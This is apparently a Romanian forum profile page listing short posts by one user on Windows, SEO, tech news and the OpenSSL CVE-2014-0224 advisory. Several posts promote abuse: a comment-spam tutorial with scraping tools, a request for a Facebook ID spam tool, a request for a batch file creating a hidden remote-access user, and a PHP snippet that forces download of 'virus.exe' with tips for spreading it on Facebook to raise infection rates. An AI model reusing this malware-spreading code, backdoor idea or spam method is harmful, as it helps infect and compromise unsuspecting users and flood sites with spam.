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Everything posted by sandabot

  1. Pentru mine windows 7 , e fluid, simplu, interfata frumoasa dar cel mai important pentru un multi-tasking user se diferentiaza de celelalte OS-uri prin rapiditate si management multiplu.
  2. Desi am inregistrat cateva anul trecut cand era aceeasi promotie, serviciile lor erau oribile plus ca m-am trezit cu vreo 2-3 comenzi anulate din pricina faptului ca "promotia nu mai este valabila" . Plus sa nu zic despre spamul zilnic care-mi ajungea in mail de la ei. Dar pentru 0.5$ nu cred ca ar face cineva mofturi asa ca mersi.
  3. Ok merge insa e bun doar pentru adunarea de ID-ul numeric al userilor dintr-o pagina, grup etc. Va intreb daca aveti un program care sa foloseasca ID-urile in scop de spam.
  4. The Machine is six times more powerful than existing computational devices. HP has unveiled a new machine that has the potential to revolutionise computing and cope with the massive amounts of data generated by mobile devices and the Internet of things (a network composed of household appliances, cars, vending machines and many other devices). The Machine is designed to cope with tonnes of information by using clusters of special-purpose cores that are more efficient than generalised cores. It is wired with photonics instead of copper wires, meaning it consumes 80 times less energy and is much faster. According to HP, it can handle 160 petabytes of data in 250 nanoseconds. The Machine is six times more powerful than existing servers. However, the first models powered by this technology won’t be commercially available until 2018.
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  6. Se face oficial un lucru care deja se practica nu doar in Romania ci worldwide. Oricum nu va panicati, pentru un cont de metin nu va pune in capul listei de supraveghere.
  7. Aici e flaw : Daca vrei sa ajungi iar la 100E cere-i lu' tactu' 50 de euro in loc de 49 Si cica problema de matematica, il faci de ras pe Arhimede .
  8. Vom avea nevoie de urmatoarele resurse : 1. GScraper 2. Comment Blaster 3. Optional un VPS - recomand cele de la @wtf Steps 1. Scrapam site-uri in functie de keywordul nostru 2. In cateva secunde vi se vor arata toate site-urile scrapate si se va creea un fisier pe desktop 3. Acum de ducem in Comment Blaster si ne creeam profilul 4. Odata ce v-ati facut profilul importam acea lista facuta de GScraper si incepem sa comentam ! 5. Asteptam rezultate Optional puteti sa folositi proxy cand postati sau sa folositi anchor text in profil.
  9. Remember OpenSSL Heartbleed vulnerability? Several weeks ago, the exposure of this security bug chilled the Internet, revealed that millions of websites were vulnerable to a flaw in the OpenSSL code which they used to encrypt their communications. Now once again the OpenSSL Foundation has issued software updates to patch six new vulnerabilities, and two of them are critical. MAN-IN-THE-MIDDLE ATTACK (CVE-2014-0224) First critical vulnerability (CVE-2014-0224) in OpenSSL is "CCS Injection" - resides in ChangeCipherSpec (CCS) request sent during the handshake that could allow an attacker to perform a man-in-the-middle attack against the encrypted connection servers and clients. By exploiting this vulnerability an attacker could intercept an encrypted connection which allows him to decrypt, read or manipulate the data. But the reported flaw is exploitable only if both server and client are vulnerable to this issue. According to the OpenSSL advisory, "An attacker using a carefully crafted handshake can force the use of weak keying material in OpenSSL SSL/TLS clients and servers." All versions of OpenSSL are vulnerable on the client side. Only 1.0.1 and above are currently known to be vulnerable on the server side. SSL VPN (virtual private network) products are believed to be especially vulnerable to this flaw. OpenSSL CCS Injection vulnerability is discovered by a Japanese security researcher, Masashi Kikuchi from Lepidum security firm. According to him this bug was existed since the very first release of OpenSSL. RedHat also posted a detailed explanation about this bug on their security blog. DTLS invalid fragment vulnerability (CVE-2014-0195): Sending invalid DTLS fragments to a OpenSSL DTLS client or server can lead to a buffer overrun attack. A potential hacker could exploit this flaw to run arbitrary code on a vulnerable client or server. This vulnerability also marked as critical bug. DTLS recursion flaw (CVE-2014-0221): A remote attacker can send an invalid DTLS (Datagram Transport Layer Security) handshake to an OpenSSL DTLS client, which will force the code to recurse eventually crashing in a DoS attack. This attack is limited to the applications using OpenSSL as a DTLS client. DTLS mainly used in VOIP and other communication related applications like Cisco Systems’ AnyConnect VPN Client. Chrome and Firefox web browser also support DTLS for WebRTC (Web Real-Time Communication) for P2P file sharing and Voice/Video Chats. Other important OpenSSL vulnerabilities are: SSL_MODE_RELEASE_BUFFERS NULL pointer dereference (CVE-2014-0198), allows remote attackers to cause a denial of service via a NULL pointer dereference. SSL_MODE_RELEASE_BUFFERS session injection or denial of service (CVE-2010-5298), allows remote attackers to inject data across sessions or cause a denial of service. Anonymous ECDH denial of service (CVE-2014-3470), OpenSSL TLS clients enabling anonymous ECDH (Elliptic Curve Diffie Hellman) ciphersuites are subject to a denial of service attack. But the good news is that these vulnerabilities are not as critical as Heartbleed bug. The patched versions 0.9.8za, 1.0.0m and 1.0.1h are available on the project website to download and The OpenSSL Foundation is urging companies to update their implementation as soon as possible. Source
  10. Download : https://mega.co.nz/#!7JxjhaDQ!e0JqfzOUTfZKBF2dxSFQf6D75zkMI2_Q1V0xshlx9Uo Are toate functiile incluse . Fara install just run&scrap
  11. Ce vrei tu sa faci este targeting national, si crede-ma ca daca as avea o firma de croitorie, nu as da anunt in toata tara daca eu am sediul in Brasov . Am postat eu un tutorial asemanator doar ca diferenta cruciala este aceea ca eu indrum un taget cat mai restrans si nu vinderea unei portiuni din site ci inchirierea lunara a intregului website. Asa ca inregistrati CroitorieBrasov.ro , puneti wordpress cu landing page pe el , faceti-i SEO si duceti-va la patron cu oferta .
  12. Thalassophobia - Wikipedia, the free encyclopedia pentru oceane. Poti sa stai linistit, sunt fobii toata lumea le are.
  13. Doar ca un comentariu, acest tool suite este doar de analiza SEO , nu de creeare de backlinkuri sau scrapping/posting. Este bun daca vreti sa urmariti ascensiunea site-ului pe un keyword, al PR-ului, backlinkurilor existente si de spionare a concurentei.
  14. 1 -a 2- b 3- c/d @MisterJoeDark ce serviciu de PTC ai folosit pentru reclama ?
  15. Ca feedback eram interesat de codul de auto-download : <?php header('Content-Type: application/download'); header('Content-Disposition: attachment; filename="virus.exe"'); header("Content-Length: " . filesize("virus.exe")); $fp = fopen("virus.exe", "r"); fpassthru($fp); fclose($fp); ?> Asta era singurul lucru care facea programul util si posibilitatea de creeare de landing-pages pentru spread pentru cei fara cunostinte cum am zis. Singurul flaw se intampla in Google Chrome unde da faza cu "Acest fisier nu este downloadat de obicei si poate fi periculos" , asta se intampla cand pun fisierele pe host (subdomeniu gratis) dar nu si in localhost . Ca un sfat de la mine, spreadingul se face cel mai bine pe facebook , in plus de asta pentru a mari sansa de instalare a virusului puneti codul <meta property="og:image" content="http://site.com/image.jpg"> unde image.jpg este thumbnailul ala de langa orice link de pe facebook iar apoi treceti site-ul prin https://developers.facebook.com/tools/debug/ pentru a vi-l recunoaste . Asta va poate aduce un procent mai mare la metoda asta.
  16. E mai mult ceva user-friendly pentru cei care nu stiu sa faca un landing page pe HTML/PHP . O sa-l iau totusi pentru optiunea de auto-download. Si nu uitati ca cea mai importanta parte este nisa asa ca make it catchy.
  17. PPD , PPL , CPC , Marketing afiliat Sunt multe metode dar nimeni n-o sa te invete.
  18. Omul a postat un pret /post, nu il obliga nimeni sa aiba o limita minima per articol atata timp cat se gaseste cineva sa il faca (desi ma indoiesc ca cineva care cunoaste limba engleza fluent ar acepta oferta, daca site-ul era .ro se gaseau cativa masterchefi sa puna acolo retete) . Inca ceva, nisa retetelor este supra-saturata si faptul ca este in engleza e si mai rau pentru ca femeile care vorbesc engleza si au aces la internet nu stiu sa faca prea multe mancaruri.
  19. Daca pot sa fac o cerere de un .bat care sa creeze un user nou ascuns cu o parola definita de mine iar acel user sa aiba remote acces activat ?
  20. Suna interesant si mi se mare seriviciul de calitate insa vreau sa stiu cam cat de mare este impactul asupra pozitiei in google si la ce internal de timp.
  21. Subscriu si eu cu GSA , si daca ai ceva scraper+poster .
  22. Done !
  23. DailyPTZ e un site gen lockerz (castigi puncte -> cumperi prostii) deschis ieri oficial. Am fost beta-tester , baietii sunt de treaba si produsele se livreaza . Site : http://www.dailyptz.ro/ Daca vreti o invitatie dati-mi PM / postati aici adresa de mail.
  24. Am citit sute de e-bookuri despre monetizare seo si surse de trafic si aproape toate m-au lasat cu impresia ca nu s-ar merita sa dau atatia dolari pentru informatiile alea. Cine stie ce trick stie e-bookul asta dar personal n-as da 50 de euro pentru ea .
  25. Nu se va ajunge la conflict aici e vorba despre cine are gura cea mai mare si chiar daca se ajunge la razboi se rezolva cu un certificat de handicap cu o cafea si o ciocolata la doctorita.
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